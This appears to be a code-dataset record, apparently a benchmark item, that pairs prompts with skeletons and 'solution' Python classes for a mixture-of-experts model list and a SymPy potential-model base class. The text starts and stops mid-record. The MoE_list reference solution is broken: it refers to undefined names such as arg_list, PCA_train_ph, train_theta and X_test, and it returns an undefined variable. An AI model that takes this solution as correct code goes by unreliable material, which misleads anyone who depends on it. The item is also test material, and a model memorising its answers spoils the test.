of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure", "name": "fit", "signature": "def fit(self, X_train, y_train, args_list=None)"}, {"docstring": "Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned", "name": "models", "signature": "def models(self, k_list=None)"}, {"docstring": "Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model", "name": "predict", "signature": "def predict(self, X)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_006026", "prompt": "Implement the Python class `MoE_list` described below.\n\nClass description:\nThis class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\n\nMethod signatures and docstrings:\n- def __init__(self, K, folder=None, D=1, N_exp_list=10): Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\n- def load(self, folder, load_function=None): Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\n- def save(self, folder): Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\n- def fit(self, X_train, y_train, args_list=None): Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\n- def models(self, k_list=None): Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\n- def predict(self, X): Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model", "prompted_full_text": "Implement the Python class `MoE_list` described below.\n\nClass description:\nThis class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\n\nMethod signatures and docstrings:\n- def __init__(self, K, folder=None, D=1, N_exp_list=10): Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\n- def load(self, folder, load_function=None): Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\n- def save(self, folder): Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\n- def fit(self, X_train, y_train, args_list=None): Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\n- def models(self, k_list=None): Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\n- def predict(self, X): Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\n\n<|skeleton|>\nclass MoE_list:\n \"\"\"This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\"\"\"\n\n def __init__(self, K, folder=None, D=1, N_exp_list=10):\n \"\"\"Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\"\"\"\n <|body_0|>\n\n def load(self, folder, load_function=None):\n \"\"\"Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\"\"\"\n <|body_1|>\n\n def save(self, folder):\n \"\"\"Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\"\"\"\n <|body_2|>\n\n def fit(self, X_train, y_train, args_list=None):\n \"\"\"Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\"\"\"\n <|body_3|>\n\n def models(self, k_list=None):\n \"\"\"Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\"\"\"\n <|body_4|>\n\n def predict(self, X):\n \"\"\"Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.K = K\n if folder is not None:\n self.MoE_list = [None for k in range(K)]\n self.load(folder)\n else:\n if type(N_exp_list) is int:\n N_exp_list = [N_exp_list for k in range(self.K)]\n if len(N_exp_list) != self.K:\n raise TypeError(\"Lenght of number of expters list doesn't match number of models!\")\n self.D = D\n for k in range(self.K):\n self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\n return\n<|end_body_0|>\n\n<|body_start_1|>\n file_list = os.listdir(folder)\n D_list = []\n for k in range(self.K):\n if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n self.MoE_list[k] = MoE_model(self.D, 1)\n self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n D, N_exp = MoE_list[k].get_iperparams()\n D_list.append(D)\n self.N_exp_list[k] = N_exp\n assert len(set(D_list)) == 1\n self.D = D_list[0]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for k in range(self.K):\n self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if type(arg_list) is tuple:\n arg_list = [arg_list for k in range(self.K)]\n assert y_train.shape[1] == self.K\n assert X_train.shape[0] == y_train.shape[0]\n assert X.shape[1] == self.D\n for k in range(self.K):\n print('Fitting component ', k)\n y_train = PCA_train_ph[:, k]\n MoE_models[k].fit(train_theta, y_train, *arg_list[k])\n return\n<|end_body_3|>\n\n<|body_start_4|>\n if k_list is None:\n k_list = range(self.K)\n return self.MoE_list[k]\n<|end_body_4|>\n\n<|body_start_5|>\n assert X.shape[1] == self.D\n y = np.zeros((X_test.shape[0], self.K))\n for k in range(self.K):\n y[:, k] = self.MoE_list[k].predict(X)\n return y\n<|end_body_5|>\n", "revision_id": "a786e9ce5845ba1f82980c5265307914c3c26e68", "skeleton": "<|skeleton|>\nclass MoE_list:\n \"\"\"This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\"\"\"\n\n def __init__(self, K, folder=None, D=1, N_exp_list=10):\n \"\"\"Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\"\"\"\n <|body_0|>\n\n def load(self, folder, load_function=None):\n \"\"\"Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\"\"\"\n <|body_1|>\n\n def save(self, folder):\n \"\"\"Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\"\"\"\n <|body_2|>\n\n def fit(self, X_train, y_train, args_list=None):\n \"\"\"Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\"\"\"\n <|body_3|>\n\n def models(self, k_list=None):\n \"\"\"Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\"\"\"\n <|body_4|>\n\n def predict(self, X):\n \"\"\"Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MoE_list:\n \"\"\"This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\"\"\"\n\n def __init__(self, K, folder=None, D=1, N_exp_list=10):\n \"\"\"Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\"\"\"\n self.K = K\n if folder is not None:\n self.MoE_list = [None for k in range(K)]\n self.load(folder)\n else:\n if type(N_exp_list) is int:\n N_exp_list = [N_exp_list for k in range(self.K)]\n if len(N_exp_list) != self.K:\n raise TypeError(\"Lenght of number of expters list doesn't match number of models!\")\n self.D = D\n for k in range(self.K):\n self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\n return\n\n def load(self, folder, load_function=None):\n \"\"\"Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\"\"\"\n file_list = os.listdir(folder)\n D_list = []\n for k in range(self.K):\n if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n self.MoE_list[k] = MoE_model(self.D, 1)\n self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n D, N_exp = MoE_list[k].get_iperparams()\n D_list.append(D)\n self.N_exp_list[k] = N_exp\n assert len(set(D_list)) == 1\n self.D = D_list[0]\n return\n\n def save(self, folder):\n \"\"\"Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\"\"\"\n for k in range(self.K):\n self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\n return\n\n def fit(self, X_train, y_train, args_list=None):\n \"\"\"Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\"\"\"\n if type(arg_list) is tuple:\n arg_list = [arg_list for k in range(self.K)]\n assert y_train.shape[1] == self.K\n assert X_train.shape[0] == y_train.shape[0]\n assert X.shape[1] == self.D\n for k in range(self.K):\n print('Fitting component ', k)\n y_train = PCA_train_ph[:, k]\n MoE_models[k].fit(train_theta, y_train, *arg_list[k])\n return\n\n def models(self, k_list=None):\n \"\"\"Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\"\"\"\n if k_list is None:\n k_list = range(self.K)\n return self.MoE_list[k]\n\n def predict(self, X):\n \"\"\"Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\"\"\"\n assert X.shape[1] == self.D\n y = np.zeros((X_test.shape[0], self.K))\n for k in range(self.K):\n y[:, k] = self.MoE_list[k].predict(X)\n return y\n", "source": "the_stack_v2_python_sparse", "source_path": "dev/tries_checks/routines/MoE_list.py", "source_repo": "stefanoschmidt1995/MLGW", "split": "test", "star_events_count": 12} {"blob_id": "13f5823748aebb5abf21dd55f4d960ce70ecc4d3", "bodies": ["self.Bs = sy.symbols('Bx, By, Bz')\nself.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\nself.indepvars = {s.name: s for s in self.Bs + self.εs}\nself.es = tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))", "invalid_inputs = [q for q in qs if q not in self.indepvars]\nif len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\nsym = symutil.make_function('ϕ', *self.indepvars.values())\nexpr = self.φ\nfor varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\nsym = self.keyify(sym)\nif len(qs):\n expr = symutil.apply_substitutions_in(expr)\nif strip:\n expr = symutil.strip_function_arguments(expr)\nassert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\nreturn (sym, expr)", "ivars = sorted(self.indepvars.keys())\nout = {}\nallqs = []\nif jacobian:\n allqs.extend(((var,) for var in ivars))\nif hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\nfor i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\nreturn out", "expr = recursive_collect(sy.together(sy.expand(expr)))\nexpr = recursive_collect(expr, syms=self.Bs)\nexpr = symutil.collect_const_in(expr)\nreturn expr"], "bodies_text": "<|body_start_0|>\n self.Bs = sy.symbols('Bx, By, Bz')\n self.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\n self.indepvars = {s.name: s for s in self.Bs + self.εs}\n self.es = tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))\n<|end_body_0|>\n\n<|body_start_1|>\n invalid_inputs = [q for q in qs if q not in self.indepvars]\n if len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\n sym = symutil.make_function('ϕ', *self.indepvars.values())\n expr = self.φ\n for varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\n sym = self.keyify(sym)\n if len(qs):\n expr = symutil.apply_substitutions_in(expr)\n if strip:\n expr = symutil.strip_function_arguments(expr)\n assert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\n return (sym, expr)\n<|end_body_1|>\n\n<|body_start_2|>\n ivars = sorted(self.indepvars.keys())\n out = {}\n allqs = []\n if jacobian:\n allqs.extend(((var,) for var in ivars))\n if hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\n for i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\n return out\n<|end_body_2|>\n\n<|body_start_3|>\n expr = recursive_collect(sy.together(sy.expand(expr)))\n expr = recursive_collect(expr, syms=self.Bs)\n expr = symutil.collect_const_in(expr)\n return expr\n<|end_body_3|>\n", "class_docstring": "Abstract base class for scalar potential models using (B, ε).", "class_name": "PotentialModelBase", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PotentialModelBase:\n \"\"\"Abstract base class for scalar potential models using (B, ε).\"\"\"\n\n def __init__(self):\n \"\"\"Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\"\"\"\n <|body_0|>\n\n def dφdq(self, qs, strip):\n \"\"\"Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\"\"\"\n <|body_1|>\n\n def dφdqs(self, jacobian=True, hessian=True):\n \"\"\"Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\"\"\"\n <|body_2|>\n\n def simplify(self, expr):\n \"\"\"Simplify expr. Specifically geared to optimize expressions treated by this class.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Bs = sy.symbols('Bx, By, Bz')\n self.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\n self.indepvars = {s.name: s for s in self.Bs + self.εs}\n self.es = tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))\n<|end_body_0|>\n\n<|body_start_1|>\n invalid_inputs = [q for q in qs if q not in self.indepvars]\n if len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\n sym = symutil.make_function('ϕ', *self.indepvars.values())\n expr = self.φ\n for varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\n sym = self.keyify(sym)\n if len(qs):\n expr = symutil.apply_substitutions_in(expr)\n if strip:\n expr = symutil.strip_function_arguments(expr)\n assert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\n return (sym, expr)\n<|end_body_1|>\n\n<|body_start_2|>\n ivars = sorted(self.indepvars.keys())\n out = {}\n allqs = []\n if jacobian:\n allqs.extend(((var,) for var in ivars))\n if hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\n for i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\n return out\n<|end_body_2|>\n\n<|body_start_3|>\n expr = recursive_collect(sy.together(sy.expand(expr)))\n expr = recursive_collect(expr, syms=self.Bs)\n expr = symutil.collect_const_in(expr)\n return expr\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000333", "length_bytes": 8995, "license_type": "permissive", "methods": [{"docstring": "Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",", "name": "dφdq", "signature": "def dφdq(self, qs, strip)"}, {"docstring": "Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.", "name": "dφdqs", "signature": "def dφdqs(self, jacobian=True, hessian=True)"}, {"docstring": "Simplify expr. Specifically geared to optimize expressions treated by this class.", "name": "simplify", "signature": "def simplify(self, expr)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_003178", "prompt": "Implement the Python class `PotentialModelBase` described below.\n\nClass description:\nAbstract base class for scalar potential models using (B, ε).\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\n- def dφdq(self, qs, strip): Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\n- def dφdqs(self, jacobian=True, hessian=True): Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\n- def simplify(self, expr): Simplify expr. Specifically geared to optimize expressions treated by this class.", "prompted_full_text": "Implement the Python class `PotentialModelBase` described below.\n\nClass description:\nAbstract base class for scalar potential models using (B, ε).\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\n- def dφdq(self, qs, strip): Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\n- def dφdqs(self, jacobian=True, hessian=True): Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\n- def simplify(self, expr): Simplify expr. Specifically geared to optimize expressions treated by this class.\n\n<|skeleton|>\nclass PotentialModelBase:\n \"\"\"Abstract base class for scalar potential models using (B, ε).\"\"\"\n\n def __init__(self):\n \"\"\"Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\"\"\"\n <|body_0|>\n\n def dφdq(self, qs, strip):\n \"\"\"Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\"\"\"\n <|body_1|>\n\n def dφdqs(self, jacobian=True, hessian=True):\n \"\"\"Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\"\"\"\n <|body_2|>\n\n def simplify(self, expr):\n \"\"\"Simplify expr. Specifically geared to optimize expressions treated by this class.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Bs = sy.symbols('Bx, By, Bz')\n self.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\n self.indepvars = {s.name: s for s in self.Bs + self.εs}\n self.es = tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))\n<|end_body_0|>\n\n<|body_start_1|>\n invalid_inputs = [q for q in qs if q not in self.indepvars]\n if len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\n sym = symutil.make_function('ϕ', *self.indepvars.values())\n expr = self.φ\n for varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\n sym = self.keyify(sym)\n if len(qs):\n expr = symutil.apply_substitutions_in(expr)\n if strip:\n expr = symutil.strip_function_arguments(expr)\n assert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\n return (sym, expr)\n<|end_body_1|>\n\n<|body_start_2|>\n ivars = sorted(self.indepvars.keys())\n out = {}\n allqs = []\n if jacobian:\n allqs.extend(((var,) for var in ivars))\n if hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\n for i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\n return out\n<|end_body_2|>\n\n<|body_start_3|>\n expr = recursive_collect(sy.together(sy.expand(expr)))\n expr = recursive_collect(expr, syms=self.Bs)\n expr = symutil.collect_const_in(expr)\n return expr\n<|end_body_3|>\n", "revision_id": "02d97557e08cbeb3d53470934f471a6ede723570", "skeleton": "<|skeleton|>\nclass PotentialModelBase:\n \"\"\"Abstract base class for scalar potential models using (B, ε).\"\"\"\n\n def __init__(self):\n \"\"\"Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\"\"\"\n <|body_0|>\n\n def dφdq(self, qs, strip):\n \"\"\"Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\"\"\"\n <|body_1|>\n\n def dφdqs(self, jacobian=True, hessian=True):\n \"\"\"Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\"\"\"\n <|body_2|>\n\n def simplify(self, expr):\n \"\"\"Simplify expr. Specifically geared to optimize expressions treated by this class.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PotentialModelBase:\n \"\"\"Abstract base class for scalar potential models using (B, ε).\"\"\"\n\n def __init__(self):\n \"\"\"Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\"\"\"\n self.Bs = sy.symbols('Bx, By, Bz')\n self.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\n self.indepvars = {s.name: s for s in self.Bs + self.εs}\n self.es = 